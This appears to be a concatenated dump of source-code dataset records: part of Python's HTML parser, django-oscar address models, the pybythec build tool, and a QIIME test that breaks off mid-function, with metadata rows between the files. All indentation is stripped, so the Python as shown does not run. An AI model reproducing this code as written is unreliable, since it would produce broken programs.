True the character references are converted automatically to the
corresponding Unicode character (and self.handle_data() is no
longer split in chunks), otherwise they are passed by calling
self.handle_entityref() or self.handle_charref() with the string
containing respectively the named or numeric reference as the
argument.
"""
CDATA_CONTENT_ELEMENTS = ("script", "style")
def __init__(self, *, convert_charrefs=True):
"""Initialize and reset this instance.
If convert_charrefs is True (the default), all character references
are automatically converted to the corresponding Unicode characters.
"""
self.convert_charrefs = convert_charrefs
self.reset()
def reset(self):
"""Reset this instance. Loses all unprocessed data."""
self.rawdata = ''
self.lasttag = '???'
self.interesting = interesting_normal
self.cdata_elem = None
_markupbase.ParserBase.reset(self)
def feed(self, data):
r"""Feed data to the parser.
Call this as often as you want, with as little or as much text
as you want (may include '\n').
"""
self.rawdata = self.rawdata + data
self.goahead(0)
def close(self):
"""Handle any buffered data."""
self.goahead(1)
__starttag_text = None
def get_starttag_text(self):
"""Return full source of start tag: '<...>'."""
return self.__starttag_text
def set_cdata_mode(self, elem):
self.cdata_elem = elem.lower()
self.interesting = re.compile(r'</\s*%s\s*>' % self.cdata_elem, re.I)
def clear_cdata_mode(self):
self.interesting = interesting_normal
self.cdata_elem = None
# Internal -- handle data as far as reasonable. May leave state
# and data to be processed by a subsequent call. If 'end' is
# true, force handling all data as if followed by EOF marker.
def goahead(self, end):
rawdata = self.rawdata
i = 0
n = len(rawdata)
while i < n:
if self.convert_charrefs and not self.cdata_elem:
j = rawdata.find('<', i)
if j < 0:
# if we can't find the next <, either we are at the end
# or there's more text incoming. If the latter is True,
# we can't pass the text to handle_data in case we have
# a charref cut in half at end. Try to determine if
# this is the case before proceeding by looking for an
# & near the end and see if it's followed by a space or ;.
amppos = rawdata.rfind('&', max(i, n-34))
if (amppos >= 0 and
not re.compile(r'[\s;]').search(rawdata, amppos)):
break # wait till we get all the text
j = n
else:
match = self.interesting.search(rawdata, i) # < or &
if match:
j = match.start()
else:
if self.cdata_elem:
break
j = n
if i < j:
if self.convert_charrefs and not self.cdata_elem:
self.handle_data(unescape(rawdata[i:j]))
else:
self.handle_data(rawdata[i:j])
i = self.updatepos(i, j)
if i == n: break
startswith = rawdata.startswith
if startswith('<', i):
if starttagopen.match(rawdata, i): # < + letter
k = self.parse_starttag(i)
elif startswith("</", i):
k = self.parse_endtag(i)
elif startswith("<!--", i):
k = self.parse_comment(i)
elif startswith("<?", i):
k = self.parse_pi(i)
elif startswith("<!", i):
k = self.parse_html_declaration(i)
elif (i + 1) < n:
self.handle_data("<")
k = i + 1
else:
break
if k < 0:
if not end:
break
k = rawdata.find('>', i + 1)
if k < 0:
k = rawdata.find('<', i + 1)
if k < 0:
k = i + 1
else:
k += 1
if self.convert_charrefs and not self.cdata_elem:
self.handle_data(unescape(rawdata[i:k]))
else:
self.handle_data(rawdata[i:k])
i = self.updatepos(i, k)
elif startswith("&#", i):
match = charref.match(rawdata, i)
if match:
name = match.group()[2:-1]
self.handle_charref(name)
k = match.end()
if not startswith(';', k-1):
k = k - 1
i = self.updatepos(i, k)
continue
else:
if ";" in rawdata[i:]: # bail by consuming &#
self.handle_data(rawdata[i:i+2])
i = self.updatepos(i, i+2)
break
elif startswith('&', i):
match = entityref.match(rawdata, i)
if match:
name = match.group(1)
self.handle_entityref(name)
k = match.end()
if not startswith(';', k-1):
k = k - 1
i = self.updatepos(i, k)
continue
match = incomplete.match(rawdata, i)
if match:
# match.group() will contain at least 2 chars
if end and match.group() == rawdata[i:]:
k = match.end()
if k <= i:
k = n
i = self.updatepos(i, i + 1)
# incomplete
break
elif (i + 1) < n:
# not the end of the buffer, and can't be confused
# with some other construct
self.handle_data("&")
i = self.updatepos(i, i + 1)
else:
break
else:
assert 0, "interesting.search() lied"
# end while
if end and i < n and not self.cdata_elem:
if self.convert_charrefs and not self.cdata_elem:
self.handle_data(unescape(rawdata[i:n]))
else:
self.handle_data(rawdata[i:n])
i = self.updatepos(i, n)
self.rawdata = rawdata[i:]
# Internal -- parse html declarations, return length or -1 if not terminated
# See w3.org/TR/html5/tokenization.html#markup-declaration-open-state
# See also parse_declaration in _markupbase
def parse_html_declaration(self, i):
rawdata = self.rawdata
assert rawdata[i:i+2] == '<!', ('unexpected call to '
'parse_html_declaration()')
if rawdata[i:i+4] == '<!--':
# this case is actually already handled in goahead()
return self.parse_comment(i)
elif rawdata[i:i+3] == '<![':
return self.parse_marked_section(i)
elif rawdata[i:i+9].lower() == '<!doctype':
# find the closing >
gtpos = rawdata.find('>', i+9)
if gtpos == -1:
return -1
self.handle_decl(rawdata[i+2:gtpos])
return gtpos+1
else:
return self.parse_bogus_comment(i)
# Internal -- parse bogus comment, return length or -1 if not terminated
# see http://www.w3.org/TR/html5/tokenization.html#bogus-comment-state
def parse_bogus_comment(self, i, report=1):
rawdata = self.rawdata
assert rawdata[i:i+2] in ('<!', '</'), ('unexpected call to '
'parse_comment()')
pos = rawdata.find('>', i+2)
if pos == -1:
return -1
if report:
self.handle_comment(rawdata[i+2:pos])
return pos + 1
# Internal -- parse processing instr, return end or -1 if not terminated
def parse_pi(self, i):
rawdata = self.rawdata
assert rawdata[i:i+2] == '<?', 'unexpected call to parse_pi()'
match = piclose.search(rawdata, i+2) # >
if not match:
return -1
j = match.start()
self.handle_pi(rawdata[i+2: j])
j = match.end()
return j
# Internal -- handle starttag, return end or -1 if not terminated
def parse_starttag(self, i):
self.__starttag_text = None
endpos = self.check_for_whole_start_tag(i)
if endpos < 0:
return endpos
rawdata = self.rawdata
self.__starttag_text = rawdata[i:endpos]
# Now parse the data between i+1 and j into a tag and attrs
attrs = []
match = tagfind_tolerant.match(rawdata, i+1)
assert match, 'unexpected call to parse_starttag()'
k = match.end()
self.lasttag = tag = match.group(1).lower()
while k < endpos:
m = attrfind_tolerant.match(rawdata, k)
if not m:
break
attrname, rest, attrvalue = m.group(1, 2, 3)
if not rest:
attrvalue = None
elif attrvalue[:1] == '\'' == attrvalue[-1:] or \
attrvalue[:1] == '"' == attrvalue[-1:]:
attrvalue = attrvalue[1:-1]
if attrvalue:
attrvalue = unescape(attrvalue)
attrs.append((attrname.lower(), attrvalue))
k = m.end()
end = rawdata[k:endpos].strip()
if end not in (">", "/>"):
lineno, offset = self.getpos()
if "\n" in self.__starttag_text:
lineno = lineno + self.__starttag_text.count("\n")
offset = len(self.__starttag_text) \
- self.__starttag_text.rfind("\n")
else:
offset = offset + len(self.__starttag_text)
self.handle_data(rawdata[i:endpos])
return endpos
if end.endswith('/>'):
# XHTML-style empty tag: <span attr="value" />
self.handle_startendtag(tag, attrs)
else:
self.handle_starttag(tag, attrs)
if tag in self.CDATA_CONTENT_ELEMENTS:
self.set_cdata_mode(tag)
return endpos
# Internal -- check to see if we have a complete starttag; return end
# or -1 if incomplete.
def check_for_whole_start_tag(self, i):
rawdata = self.rawdata
m = locatestarttagend_tolerant.match(rawdata, i)
if m:
j = m.end()
next = rawdata[j:j+1]
if next == ">":
return j + 1
if next == "/":
if rawdata.startswith("/>", j):
return j + 2
if rawdata.startswith("/", j):
# buffer boundary
return -1
# else bogus input
if j > i:
return j
else:
return i + 1
if next == "":
# end of input
return -1
if next in ("abcdefghijklmnopqrstuvwxyz=/"
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"):
# end of input in or before attribute value, or we have the
# '/' from a '/>' ending
return -1
if j > i:
return j
else:
return i + 1
raise AssertionError("we should not get here!")
# Internal -- parse endtag, return end or -1 if incomplete
def parse_endtag(self, i):
rawdata = self.rawdata
assert rawdata[i:i+2] == "</", "unexpected call to parse_endtag"
match = endendtag.search(rawdata, i+1) # >
if not match:
return -1
gtpos = match.end()
match = endtagfind.match(rawdata, i) # </ + tag + >
if not match:
if self.cdata_elem is not None:
self.handle_data(rawdata[i:gtpos])
return gtpos
# find the name: w3.org/TR/html5/tokenization.html#tag-name-state
namematch = tagfind_tolerant.match(rawdata, i+2)
if not namematch:
# w3.org/TR/html5/tokenization.html#end-tag-open-state
if rawdata[i:i+3] == '</>':
return i+3
else:
return self.parse_bogus_comment(i)
tagname = namematch.group(1).lower()
# consume and ignore other stuff between the name and the >
# Note: this is not 100% correct, since we might have things like
# </tag attr=">">, but looking for > after tha name should cover
# most of the cases and is much simpler
gtpos = rawdata.find('>', namematch.end())
self.handle_endtag(tagname)
return gtpos+1
elem = match.group(1).lower() # script or style
if self.cdata_elem is not None:
if elem != self.cdata_elem:
self.handle_data(rawdata[i:gtpos])
return gtpos
self.handle_endtag(elem)
self.clear_cdata_mode()
return gtpos
# Overridable -- finish processing of start+end tag: <tag.../>
def handle_startendtag(self, tag, attrs):
self.handle_starttag(tag, attrs)
self.handle_endtag(tag)
# Overridable -- handle start tag
def handle_starttag(self, tag, attrs):
pass
# Overridable -- handle end tag
def handle_endtag(self, tag):
pass
# Overridable -- handle character reference
def handle_charref(self, name):
pass
# Overridable -- handle entity reference
def handle_entityref(self, name):
pass
# Overridable -- handle data
def handle_data(self, data):
pass
# Overridable -- handle comment
def handle_comment(self, data):
pass
# Overridable -- handle declaration
def handle_decl(self, decl):
pass
# Overridable -- handle processing instruction
def handle_pi(self, data):
pass
def unknown_decl(self, data):
pass
# Internal -- helper to remove special character quoting
def unescape(self, s):
warnings.warn('The unescape method is deprecated and will be removed '
'in 3.5, use html.unescape() instead.',
DeprecationWarning, stacklevel=2)
return unescape(s)
| lgpl-2.1 | -4,034,221,794,916,283,000 | 36.704255 | 80 | 0.490792 | false | 4.209905 | false | false | false |
aykut/django-oscar | oscar/apps/address/abstract_models.py | 1 | 7907 | import zlib
from django.db import models
from django.utils.translation import ugettext_lazy as _
class AbstractAddress(models.Model):
"""
Superclass address object
This is subclassed and extended to provide models for
user, shipping and billing addresses.
The only required fields are last_name, line1 and postcode.
"""
# @todo: Need a way of making these choice lists configurable
# per project
MR, MISS, MRS, MS, DR = ('Mr', 'Miss', 'Mrs', 'Ms', 'Dr')
TITLE_CHOICES = (
(MR, _("Mr")),
(MISS, _("Miss")),
(MRS, _("Mrs")),
(MS, _("Ms")),
(DR, _("Dr")),
)
title = models.CharField(_("Title"), max_length=64, choices=TITLE_CHOICES, blank=True)
first_name = models.CharField(_("First name"), max_length=255, blank=True)
last_name = models.CharField(_("Last name"), max_length=255)
# We use quite a few lines of an address as they are often quite long and
# it's easier to just hide the unnecessary ones than add extra ones.
line1 = models.CharField(_("First line of address"), max_length=255)
line2 = models.CharField(_("Second line of address"), max_length=255, blank=True)
line3 = models.CharField(_("Third line of address"), max_length=255, blank=True)
line4 = models.CharField(_("City"), max_length=255, blank=True)
state = models.CharField(_("State/County"), max_length=255, blank=True)
postcode = models.CharField(_("Post/Zip-code"), max_length=64)
country = models.ForeignKey('address.Country')
# A field only used for searching addresses - this contains all the relevant fields
search_text = models.CharField(_("Search text"), max_length=1000)
class Meta:
abstract = True
def save(self, *args, **kwargs):
self._clean_fields()
self._update_search_text()
super(AbstractAddress, self).save(*args, **kwargs)
def _clean_fields(self):
"""
Clean up fields
"""
self.first_name = self.first_name.strip()
for field in ['first_name', 'last_name', 'line1', 'line2', 'line3', 'line4', 'postcode']:
self.__dict__[field] = self.__dict__[field].strip()
# Ensure postcodes are always uppercase
if self.postcode:
self.postcode = self.postcode.upper()
def _update_search_text(self):
search_fields = filter(lambda x: x, [self.first_name, self.last_name,
self.line1, self.line2, self.line3, self.line4, self.state,
self.postcode, self.country.name])
self.search_text = ' '.join(search_fields)
@property
def summary(self):
"""
Returns a single string summary of the address,
separating fields using commas.
"""
return u", ".join(self.active_address_fields())
def populate_alternative_model(self, address_model):
"""
For populating an address model using the matching fields
from this one.
This is used to convert a user address to a shipping address
as part of the checkout process.
"""
destination_field_names = [field.name for field in address_model._meta.fields]
for field_name in [field.name for field in self._meta.fields]:
if field_name in destination_field_names and field_name != 'id':
setattr(address_model, field_name, getattr(self, field_name))
def active_address_fields(self):
u"""
Returns the non-empty components of the address, but merging the
title, first_name and last_name into a single line.
"""
self._clean_fields()
fields = filter(lambda x: x, [self.salutation(), self.line1, self.line2, self.line3,
self.line4, self.postcode])
if self.country:
fields.append(self.country.name)
return fields
def salutation(self):
u"""Returns the salutation"""
return u" ".join([part for part in [self.title, self.first_name, self.last_name] if part])
def name(self):
"""
Returns the full name
"""
return u" ".join([part for part in [self.first_name, self.last_name] if part])
def __unicode__(self):
return self.summary
class AbstractCountry(models.Model):
"""
International Organization for Standardization (ISO) 3166-1 Country list.
"""
iso_3166_1_a2 = models.CharField(_('ISO 3166-1 alpha-2'), max_length=2, primary_key=True)
iso_3166_1_a3 = models.CharField(_('ISO 3166-1 alpha-3'), max_length=3, null=True, db_index=True)
iso_3166_1_numeric = models.PositiveSmallIntegerField(_('ISO 3166-1 numeric'), null=True, db_index=True)
name = models.CharField(_('Official name (CAPS)'), max_length=128)
printable_name = models.CharField(_('Country name'), max_length=128)
is_highlighted = models.BooleanField(default=False, db_index=True)
is_shipping_country = models.BooleanField(default=False, db_index=True)
class Meta:
abstract = True
verbose_name = _('Country')
verbose_name_plural = _('Countries')
ordering = ('-is_highlighted', 'name',)
def __unicode__(self):
return self.printable_name
class AbstractShippingAddress(AbstractAddress):
u"""
Shipping address.
A shipping address should not be edited once the order has been placed -
it should be read-only after that.
"""
phone_number = models.CharField(max_length=32, blank=True, null=True)
notes = models.TextField(blank=True, null=True, help_text="""Shipping notes""")
class Meta:
abstract = True
verbose_name_plural = "shipping addresses"
class AbstractUserAddress(AbstractShippingAddress):
"""
A user address which forms an "AddressBook" for a user.
We use a separate model to shipping and billing (even though there will be
some data duplication) because we don't want shipping/billing addresses changed
or deleted once an order has been placed. By having a separate model, we allow
users the ability to add/edit/delete from their address book without affecting
orders already placed.
"""
user = models.ForeignKey('auth.User', related_name='addresses')
# Customers can set defaults
is_default_for_shipping = models.BooleanField(default=False)
is_default_for_billing = models.BooleanField(default=False)
# We keep track of the number of times an address has been used
# as a shipping address so we can show the most popular ones
# first at the checkout.
num_orders = models.PositiveIntegerField(default=0)
# A hash is kept to try and avoid duplicate addresses being added
# to the address book.
hash = models.CharField(max_length=255, db_index=True)
date_created = models.DateTimeField(auto_now_add=True)
def generate_hash(self):
u"""Returns a hash of the address summary."""
# We use an upper-case version of the summary
return zlib.crc32(self.summary.strip().upper().encode('UTF8'))
def save(self, *args, **kwargs):
u"""Save a hash of the address fields"""
# Save a hash of the address fields so we can check whether two
# addresses are the same to avoid saving duplicates
self.hash = self.generate_hash()
super(AbstractUserAddress, self).save(*args, **kwargs)
class Meta:
abstract = True
verbose_name_plural = "User addresses"
ordering = ['-num_orders']
class AbstractBillingAddress(AbstractAddress):
class Meta:
abstract = True
verbose_name_plural = "Billing addresses"
| bsd-3-clause | -9,183,936,321,529,190,000 | 38.143564 | 108 | 0.621981 | false | 4.090533 | false | false | false |
glowtree/pybythec | pybythec/__init__.py | 1 | 18150 | # -*- coding: utf-8 -*-
from pybythec import utils
from pybythec.utils import f
from pybythec.utils import PybythecError
from pybythec.BuildStatus import BuildStatus
from pybythec.BuildElements import BuildElements
import os
import sys
import time
from threading import Thread
log = utils.Logger('pybythec')
__author__ = 'glowtree'
__email__ = '[email protected]'
__version__ = '0.9.61'
def getBuildElements(osType = None,
compiler = None,
buildType = None,
binaryFormat = None,
projConfigPath = None,
globalConfigPath = None,
projConfig = None,
globalConfig = None,
currentBuild = None,
libDir = None):
'''
passthrough function that catches and reports exceptions
'''
try:
return BuildElements(
osType = osType,
compiler = compiler,
buildType = buildType,
binaryFormat = binaryFormat,
projConfig = projConfig,
projConfigPath = projConfigPath,
globalConfig = globalConfig,
globalConfigPath = globalConfigPath,
currentBuild = currentBuild,
libDir = libDir)
except PybythecError as e:
log.error(e)
return None
except Exception as e:
log.error('unknown exception: {0}', e)
return None
def build(be = None, builds = None):
'''
be: BuildElements object
builds: list of build overrides
'''
if not be:
be = getBuildElements()
if not be:
return
_runPreScript(be)
buildsRef = builds
if not buildsRef:
buildsRef = be.builds
if type(buildsRef) is not list:
buildsRef = [buildsRef]
for build in buildsRef:
try:
be.configBuild(currentBuild = build)
except PybythecError as e:
log.error(e)
continue
except Exception as e:
log.error('unknown exception: {0}', e)
continue
_build(be)
def _build(be):
'''
does the dirty work of compiling and linking based on the state setup in the BuildElements object be
'''
threading = True # TODO: perhaps this could be an function argument
buildStatus = BuildStatus(be.targetFilename, be.buildPath)
# lock - early return
if be.locked and os.path.exists(be.targetInstallPath):
buildStatus.writeInfo('locked', '{0} is locked', be.targetName)
return True
startTime = time.time()
log.info('building ' + be.infoStr)
buildingLib = False
if be.libDir:
buildingLib = True
if not os.path.exists(be.installPath):
utils.createDirs(be.installPath)
if not os.path.exists(be.buildPath):
os.makedirs(be.buildPath)
incPathList = []
for incPath in be.incPaths:
if os.path.exists(incPath):
incPathList += ['-I', incPath]
else:
log.warning('incPath {0} doesn\'t exist', incPath)
for extIncPath in be.extIncPaths: # external include libs (for cases where 3rd party header includes are using "" instead of <> ie Unreal)
if os.path.exists(incPath):
incPathList += ['-I', extIncPath]
else:
log.warning('extIncPath {0} doesn\'t exist', extIncPath)
definesList = []
for define in be.defines:
definesList += ['-D', define]
#
# qt moc file compilation, TODO: make this another compiler option, along with asm
#
mocPaths = []
for qtClass in be.qtClasses:
found = False
mocPath = f('{0}/moc_{1}.cpp', be.buildPath, qtClass)
qtClassHeader = qtClass + '.h'
for incPath in be.incPaths: # find the header file, # TODO: should there be a separate list of headers ie be.mocIncPaths?
includePath = incPath + '/' + qtClassHeader
if not os.path.exists(includePath):
continue
if os.path.exists(mocPath) and float(os.stat(mocPath).st_mtime) < float(os.stat(includePath).st_mtime) or not os.path.exists(mocPath):
buildStatus.description = 'qt moc: ' + utils.runCmd(['moc'] + definesList + [includePath, '-o', mocPath])
if not os.path.exists(mocPath):
buildStatus.writeError(buildStatus.description)
return False
mocPaths.append(mocPath)
found = True
if not found:
buildStatus.writeError('can\'t find {0} for qt moc compilation', qtClassHeader)
return False
for mocPath in mocPaths:
be.sources.append(mocPath)
buildStatusDeps = [] # the build status for each dependency: objs and libs
threads = []
i = 0
#
# compile
#
objPaths = []
cmd = [be.compilerCmd, be.objFlag] + incPathList + definesList + be.flags
if threading:
for source in be.sources:
buildStatusDep = BuildStatus(source)
buildStatusDeps.append(buildStatusDep)
thread = Thread(None, target = _compileSrc, args = (be, cmd, source, objPaths, buildStatusDep))
thread.start()
threads.append(thread)
i += 1
else:
for source in be.sources:
buildStatusDep = BuildStatus(source)
buildStatusDeps.append(buildStatusDep)
_compileSrc(be, cmd, source, objPaths, buildStatusDep)
i += 1
#
# build library dependencies
#
libCmds = []
libsBuilding = []
if be.binaryType == 'exe' or be.binaryType == 'plugin':
for lib in be.libs:
libName = lib
if be.compiler.startswith('msvc'):
libCmds += [libName + be.staticExt] # you need to link against the .lib stub file even if it's ultimately a .dll that gets linked
else:
libCmds += [be.libFlag, libName]
# check if the lib has a directory for building
if threading:
for libSrcDir in be.libSrcPaths:
libSrcDir = os.path.join(libSrcDir, lib)
if os.path.exists(libSrcDir):
libsBuilding.append(lib)
buildStatusDep = BuildStatus(lib)
buildStatusDeps.append(buildStatusDep)
thread = Thread(None, target = _buildLib, args = (be, libSrcDir, buildStatusDep))
thread.start()
threads.append(thread)
i += 1
break
else:
for libSrcPath in be.libSrcPaths:
if not os.path.exists('libSrcPath'):
log.warning('libSrcPath {0} doesn\'t exist', libSrcPath)
continue
libSrcPath = os.path.join(libSrcPath, lib)
if os.path.exists(libSrcPath):
libsBuilding.append(lib)
buildStatusDep = BuildStatus(lib)
buildStatusDeps.append(buildStatusDep)
_buildLib(be, libSrcDir, buildStatusDep)
i += 1
break
# wait for all the threads before checking the results
for thread in threads:
thread.join()
allUpToDate = True
for buildStatusDep in buildStatusDeps:
if buildStatusDep.status == 'failed':
# NOTE: changed from buildStatusDep.description.encode('ascii', 'ignore') which fixed issue on macOs
buildStatus.writeError('{0} failed because {1} failed because...\n\n{2}\n...determined in seconds\n\n', be.infoStr, buildStatusDep.name,
buildStatusDep.description, str(int(time.time() - startTime)))
return False
elif buildStatusDep.status == 'built':
allUpToDate = False
# revise the library paths
for i in range(len(be.libPaths)):
revisedLibPath = be.libPaths[i] + be.binaryRelPath
if os.path.exists(revisedLibPath):
be.libPaths[i] = revisedLibPath
else: # try without the currentBuild leaf dir, ie 3rd party libs likely won't have them
revisedLibPath = f('{0}/{1}/{2}/{3}/{4}', be.libPaths[i], be.osType, be.buildType, be.compilerVersion, be.binaryFormat)
if os.path.exists(revisedLibPath):
be.libPaths[i] = revisedLibPath
# check for multiple instances of a lib: link erros due to linking to the wrong version of a lib can be a nightmare to debug
# if you don't suspect it's the wrong version
libsFound = {} # lib name, array of paths where it was found
for p in be.libPaths:
for lib in be.libs:
if be.compiler.startswith('msvc'):
staticPath = f('{0}/{1}{2}', p, lib, be.staticExt)
dynamicPath = f('{0}/{1}{2}', p, lib, be.dynamicExt)
else:
staticPath = f('{0}/lib{1}{2}', p, lib, be.staticExt)
dynamicPath = f('{0}/lib{1}{2}', p, lib, be.dynamicExt)
if os.path.exists(staticPath) or os.path.exists(dynamicPath):
if lib in libsFound:
libsFound[lib].append(p)
else:
libsFound[lib] = [p]
for l in libsFound:
libPaths = libsFound[l]
if len(libPaths) > 1:
log.w('lib {0} found in more than one place: {1}\n', l, libPaths)
#
# linking
#
linkCmd = []
if allUpToDate and os.path.exists(be.targetInstallPath):
buildStatus.writeInfo('up to date', '{0} is up to date, determined in {1} seconds\n', be.infoStr, str(int(time.time() - startTime)))
if not buildingLib:
_runPostScript(be)
return True
# microsoft's compiler / linker can only handle so many characters on the command line
msvcLinkCmdFilePath = be.buildPath + '/linkCmd'
if be.compiler.startswith('msvc'):
msvcLinkCmd = f('{0}"{1}" "{2}" {3}', be.targetFlag, be.targetInstallPath, '" "'.join(objPaths), ' '.join(libCmds))
msvcLinkCmdFp = open(msvcLinkCmdFilePath, 'w')
msvcLinkCmdFp.write(msvcLinkCmd)
msvcLinkCmdFp.close()
linkCmd += [be.linker, '@' + msvcLinkCmdFilePath]
if be.showLinkerCmds:
log.info('\nmsvcLinkCmd: {0}\n', msvcLinkCmd)
else:
linkCmd += [be.linker, be.targetFlag, be.targetInstallPath] + objPaths + libCmds
if be.binaryType != 'static': # TODO: is this the case for msvc?
linkCmd += be.linkFlags
if be.binaryType == 'exe' or be.binaryType == 'plugin' or (be.compilerRoot == 'msvc' and be.binaryType == 'dynamic'):
for libPath in be.libPaths:
if not os.path.exists(libPath):
log.warning('libPath {0} doesn\'t exist', libPath)
continue
if be.compiler.startswith('msvc'):
linkCmd += [be.libPathFlag + os.path.normpath(libPath)]
else:
linkCmd += [be.libPathFlag, os.path.normpath(libPath)]
# get the timestamp of the existing target if it exists
linked = False
targetExisted = False
oldTargetTimeStamp = None
if os.path.exists(be.targetInstallPath):
oldTargetTimeStamp = float(os.stat(be.targetInstallPath).st_mtime)
targetExisted = True
if be.showLinkerCmds:
log.info('\n{0}\n', ' '.join(linkCmd))
buildStatus.description = utils.runCmd(linkCmd)
if os.path.exists(be.targetInstallPath):
if targetExisted:
if float(os.stat(be.targetInstallPath).st_mtime) > oldTargetTimeStamp:
linked = True
else:
linked = True
if linked:
log.info('linked ' + be.infoStr)
else:
buildStatus.writeError('linking failed because {0}', buildStatus.description)
return False
# copy dynamic library dependencies to the install path
if be.copyDynamicLibs:
if be.binaryType == 'exe' or be.binaryType == 'plugin':
for lib in be.libs:
for libPath in be.libPaths:
dynamicPath = libPath + '/'
if be.compilerRoot == 'gcc' or be.compilerRoot == 'clang':
dynamicPath += 'lib'
dynamicPath += lib + be.dynamicExt
if os.path.exists(dynamicPath):
utils.copyfile(dynamicPath, be.installPath)
buildStatus.writeInfo('built', '{0} built {1}\ncompleted in {2} seconds\n', be.infoStr, be.targetInstallPath, str(int(time.time() - startTime)))
sys.stdout.flush()
# run a post-build script if it exists
if not buildingLib:
_runPostScript(be)
return True
#
# private functions
#
def _compileSrc(be, compileCmd, source, objPaths, buildStatus):
'''
be (in): BuildElements object
compileCmd (in): the compile command so far
source (in): the c or cpp source file to compile (every source file gets it's own object file)
objPaths (out): list of all object paths that will be passed to the linker
buildStatus (out): build status for this particular compile, defaults to failed
'''
if not os.path.exists(source):
buildStatus.writeError('{0} is missing, exiting build', source)
return
objFile = os.path.basename(source)
objFile = objFile.replace(os.path.splitext(source)[1], be.objExt)
objPath = os.path.join(be.buildPath, objFile)
objPaths.append(objPath)
# check if it's up to date
objExisted = os.path.exists(objPath)
if objExisted:
objTimestamp = float(os.stat(objPath).st_mtime)
if objTimestamp > be.latestConfigTimestamp and not utils.sourceNeedsBuilding(be.incPaths, source, objTimestamp):
buildStatus.status = 'up to date'
return
# if not utils.sourceNeedsBuilding(be.incPaths, source, objTimestamp):
# buildStatus.status = 'up to date'
# return
# Microsoft Visual C has to have the objPathFlag cuddled up directly next to the objPath - no space in between them (grrr)
if be.compiler.startswith('msvc'):
cmd = compileCmd + [source, be.objPathFlag + objPath]
else:
cmd = compileCmd + [source, be.objPathFlag, objPath]
if be.showCompilerCmds:
log.info('\n' + ' '.join(cmd) + '\n')
buildStatus.description = utils.runCmd(cmd)
if os.path.exists(objPath):
if objExisted:
if float(os.stat(objPath).st_mtime) > objTimestamp:
buildStatus.status = 'built'
else:
buildStatus.status = 'built'
if buildStatus.status == 'built':
buildStatus.description = 'compiled ' + os.path.basename(source)
else:
log.error('{0} failed to build', objPath)
def _buildLib(be, libSrcDir, buildStatus):
'''
'''
libBe = getBuildElements(
osType = be.osType,
compiler = be.compiler,
buildType = be.buildType,
binaryFormat = be.binaryFormat,
projConfig = be.projConfig,
globalConfig = be.globalConfig,
currentBuild = be.currentBuild,
libDir = libSrcDir)
if not libBe:
return
build(libBe)
# read the build status
buildStatus.readFromFile(libSrcDir, be.buildDir, be.binaryRelPath)
def clean(be = None, builds = None):
'''
'''
if not be:
be = getBuildElements()
if not be:
return
buildsRef = builds
if not buildsRef:
buildsRef = be.builds
if type(buildsRef) is not list:
buildsRef = [buildsRef]
for build in buildsRef:
try:
be.configBuild(currentBuild = build)
except PybythecError as e:
log.error(e)
return
except Exception as e:
log.error('unknown exception: {0}', e)
return
_clean(be)
def _clean(be = None):
'''
cleans the current project
be (in): BuildElements object
'''
# remove any dynamic libs that are sitting next to the exe
if os.path.exists(be.installPath) and (be.binaryType == 'exe' or be.binaryType == 'plugin'):
for fl in os.listdir(be.installPath):
libName, ext = os.path.splitext(fl)
if ext == be.dynamicExt:
if be.compilerRoot == 'gcc' or be.compilerRoot == 'clang':
libName = libName.lstrip('lib')
for lib in be.libs:
if lib == libName:
p = be.installPath + '/' + fl
try:
os.remove(p)
except Exception:
log.warning('failed to remove {0}', p)
elif ext == '.exp' or ext == '.ilk' or ext == '.lib' or ext == '.pdb': # msvc files
p = be.installPath + '/' + fl
try:
os.remove(p)
except Exception:
log.warning('failed to remove {0}', p)
if not os.path.exists(be.buildPath): # canary in the coal mine
log.info(be.infoStr + ' already clean')
return True
dirCleared = True
for fl in os.listdir(be.buildPath):
p = be.buildPath + '/' + fl
try:
os.remove(p)
except Exception:
dirCleared = False
log.warning('failed to remove {0}', p)
if dirCleared:
os.removedirs(be.buildPath)
if os.path.exists(be.targetInstallPath):
os.remove(be.targetInstallPath)
target, ext = os.path.splitext(be.targetInstallPath)
if ext == '.dll':
try:
os.remove(target + '.exp')
os.remove(target + '.lib')
except Exception:
pass
try:
os.removedirs(be.installPath)
except Exception:
pass
log.info(be.infoStr + ' all clean')
return True
def cleanAll(be = None, builds = None):
'''
cleans both the current project and also the dependencies
'''
if not be:
be = getBuildElements()
if not be:
return
buildsRef = builds
if not buildsRef:
buildsRef = be.builds
if type(buildsRef) is not list:
buildsRef = [buildsRef]
for build in buildsRef:
try:
be.configBuild(currentBuild = build)
except PybythecError as e:
log.error(e)
continue
except Exception as e:
log.error('unknown exception: {0}', e)
continue
_clean(be)
# clean library dependencies
for lib in be.libs:
for libSrcPath in be.libSrcPaths:
libPath = os.path.join(libSrcPath, lib)
if os.path.exists(libPath):
libBe = getBuildElements(
osType = be.osType,
compiler = be.compiler,
buildType = be.buildType,
binaryFormat = be.binaryFormat,
projConfig = be.projConfig,
globalConfig = be.globalConfig,
currentBuild = be.currentBuild,
libDir = libPath)
if not libBe:
return
clean(libBe) # builds = build)
def _runPreScript(be):
'''
looks for a pre-build script and loads it as a module
'''
pathRoot = '.'
if be.libDir:
pathRoot = be.libDir
preScriptPath = pathRoot + '/pybythecPre.py'
if not os.path.exists(preScriptPath):
preScriptPath = pathRoot + '/.pybythecPre.py'
if os.path.exists(preScriptPath):
import imp
m = imp.load_source('', preScriptPath)
m.run(be)
def _runPostScript(be):
'''
looks for a post-build script and loads it as a module
'''
pathRoot = '.'
if be.libDir:
pathRoot = be.libDir
postScriptPath = pathRoot + '/pybythecPost.py'
if not os.path.exists(postScriptPath):
postScriptPath = pathRoot + '/.pybythecPost.py'
if os.path.exists(postScriptPath):
import imp
m = imp.load_source('', postScriptPath)
m.run(be)
| isc | 2,476,342,218,496,277,000 | 29.658784 | 146 | 0.638182 | false | 3.543538 | true | false | false |
wasade/qiime | tests/test_core_microbiome.py | 1 | 4217 | #!/usr/bin/env python
# File created on 08 Jun 2012
from __future__ import division
__author__ = "Greg Caporaso"
__copyright__ = "Copyright 2011, The QIIME project"
__credits__ = ["Greg Caporaso"]
__license__ = "GPL"
__version__ = "1.8.0-dev"
__maintainer__ = "Greg Caporaso"
__email__ = "[email protected]"
from unittest import TestCase, main
from biom.parse import parse_biom_table
from qiime.core_microbiome import (core_observations_across_sample_ids)
class ComputeCoreMicrobiomeTests(TestCase):
""" """
def setUp(self):
""" """
self.otu_table_data1 = parse_biom_table(otu_table1)
self.otu_table_data2 = parse_biom_table(otu_table2)
def test_core_observations_across_sample_ids(self):
